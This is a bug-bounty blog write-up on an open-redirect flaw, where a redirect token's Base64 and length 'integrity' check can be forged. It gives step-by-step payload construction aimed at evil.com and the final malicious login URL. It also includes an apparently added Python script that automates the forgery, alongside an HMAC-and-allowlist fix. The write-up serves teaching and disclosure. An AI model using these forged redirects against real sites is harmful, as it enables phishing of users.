
Weak Cryptography Leads To Open Redirect | by DarkLotus


Hello everyone!
I hope you are doing well and staying safe. If you are new to bug hunting, you can check my previous blog post. Today I am going to share an interesting finding of mine: an Open Redirect vulnerability.

What is Open Redirect?
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack, because many users will not notice the subsequent redirection to a different domain even if they verify these features.

Let's start! We will call our target target.com. My first step is always recon, because it plays an important role in finding bugs. Using the waybackurls tool I collected many endpoints of the target, then filtered for URLs containing a "redirect" parameter with grep. The result looked like this:

https://login.target.com/login?redirect=aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmR8MzJ8YUhSMGNITTZMeTloY0hBdWRHRnlaMlYwTG1OdmJTOWtZWE5vWW05aGNtUT0%3D

First of all, I copied the redirect value and URL-decoded it, changing "%3D" to "=", so it now looks like this:

aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmR8MzJ8YUhSMGNITTZMeTloY0hBdWRHRnlaMlYwTG1OdmJTOWtZWE5vWW05aGNtUT0=

It looks like a Base64-encoded value, so I decoded it straight away and got this:

https://app.target.com/dashboard|32|aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmQ=

For a few seconds I wondered what on earth the part after the URL was. Then I realised that "32" is the length of the URL, from the first "h" of "https" to the last "d" of "dashboard", and that the token after it is nothing but the Base64-encoded value of that same URL.

Server backend flow:
User login -> Base64-decode the redirect value -> check "integrity" via the URL length and the inner Base64 value -> if all good -> redirect

Note that no secret is involved anywhere in that chain: the length and the inner token are both derived from the URL itself, so the check only proves that the payload is self-consistent, not that the server issued it.

Now you can imagine how I was feeling. My next step was to craft a redirect to a malicious site, so all I had to do was count the length of the URL and Base64-encode it. Very simple, no?

Steps to create the payload:
1. First, count the number of characters (letters, symbols, digits, etc.) in the URL:
https://evil.com => 16

2. Now simply Base64-encode the URL:
https://evil.com => aHR0cHM6Ly9ldmlsLmNvbQ==

3. Use a pipe as the separator and combine the malicious URL, its length and the encoded value. The payload now looks like this:
https://evil.com|16|aHR0cHM6Ly9ldmlsLmNvbQ==

4. Now Base64-encode the whole payload:
aHR0cHM6Ly9ldmlsLmNvbXwxNnxhSFIwY0hNNkx5OWxkbWxzTG1OdmJRPT0=

5. URL-encode the trailing "=" as "%3D".

Simply put the final Base64-encoded value in the "redirect" parameter of the vulnerable URL, and we are ready to go:

https://login.target.com/login?redirect=aHR0cHM6Ly9ldmlsLmNvbXwxNnxhSFIwY0hNNkx5OWxkbWxzTG1OdmJRPT0%3D
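The script below is an added example, not code from the original write-up or from the target. It reproduces the decoding of the observed token and automates steps 1-5 for any URL, and it models the backend check exactly as the write-up describes it (that model is an assumption, not the target's real code). Despite the title, nothing here is cryptography: Base64 is an encoding with no key, so anyone can mint a token that passes. For contrast, the second half shows the fix a practitioner would expect, a server-side HMAC over the URL plus a host allowlist; the key name, the allowlist and the hypothetical token layout are all assumptions for illustration.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote, urlparse

# Constructed sample: the redirect value observed in the write-up (URL-encoded form).
OBSERVED_PARAM = (
    "aHR0cHM6Ly9hcHAudGFyZ2V0LmNvbS9kYXNoYm9hcmR8MzJ8"
    "YUhSMGNITTZMeTloY0hBdWRHRnlaMlYwTG1OdmJTOWtZWE5vWW05aGNtUT0%3D"
)


def decode_redirect(param):
    """Reverse the observed scheme: '%3D' -> '=', outer Base64, then split on '|'.

    Returns (url, declared_length, inner_token).
    """
    raw = base64.b64decode(unquote(param)).decode()
    url, length, inner = raw.split("|", 2)
    return url, int(length), inner


def forge_redirect(url):
    """Steps 1-5 of the write-up for an arbitrary URL. Anyone can mint a token
    that the length/Base64 'integrity' check accepts, because no secret is involved."""
    inner = base64.b64encode(url.encode()).decode()      # step 2: Base64 of the URL
    payload = f"{url}|{len(url)}|{inner}"                  # steps 1 and 3: length + pipe separators
    outer = base64.b64encode(payload.encode()).decode()    # step 4: Base64 of the whole payload
    return quote(outer, safe="")                           # step 5: '=' becomes '%3D'


def weak_is_valid(param):
    """Model of the backend check as described in the write-up (an assumption, not
    the target's real code): the token only has to be self-consistent."""
    try:
        url, length, inner = decode_redirect(param)
        return len(url) == length and base64.b64decode(inner).decode() == url
    except ValueError:  # covers binascii.Error, UnicodeDecodeError and bad int()
        return False


# --- Hardened alternative (assumption): bind the URL to a server-side secret
# and an allowlist, so only the server can mint a token and only known hosts pass.

SERVER_KEY = b"hypothetical-server-side-key"   # assumption: never leaves the server
ALLOWED_HOSTS = {"app.target.com"}             # assumption: the only legitimate redirect host


def sign_redirect(url, key=SERVER_KEY):
    """Mint a verifiable redirect token: Base64(URL|HMAC-SHA256(key, URL))."""
    tag = hmac.new(key, url.encode(), hashlib.sha256).hexdigest()
    return quote(base64.b64encode(f"{url}|{tag}".encode()).decode(), safe="")


def strong_is_valid(param, key=SERVER_KEY):
    """Accept only tokens minted with the key AND pointing at an allowlisted https host."""
    try:
        raw = base64.b64decode(unquote(param)).decode()
        url, tag = raw.rsplit("|", 1)
    except ValueError:
        return False
    expected = hmac.new(key, url.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag.encode(), expected.encode()):  # constant-time compare
        return False
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    print(decode_redirect(OBSERVED_PARAM))
    forged = forge_redirect("https://evil.com")
    print(forged)
    print("weak check accepts forged token:", weak_is_valid(forged))
    print("HMAC check accepts forged token:", strong_is_valid(forged))
```

Running it prints the decoded observed token, regenerates exactly the payload from step 4 (with the trailing "=" as "%3D"), and shows that the modelled check accepts it while the HMAC-plus-allowlist check rejects it. The allowlist matters even with the HMAC in place: a signed token for an external host is still an open redirect, just one only the server can create.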

And after login, the site smoothly redirected to evil.com. I hope you enjoyed this write-up! If you like my work, buy me a coffee and follow me on Twitter for some cool tricks.

Thank You
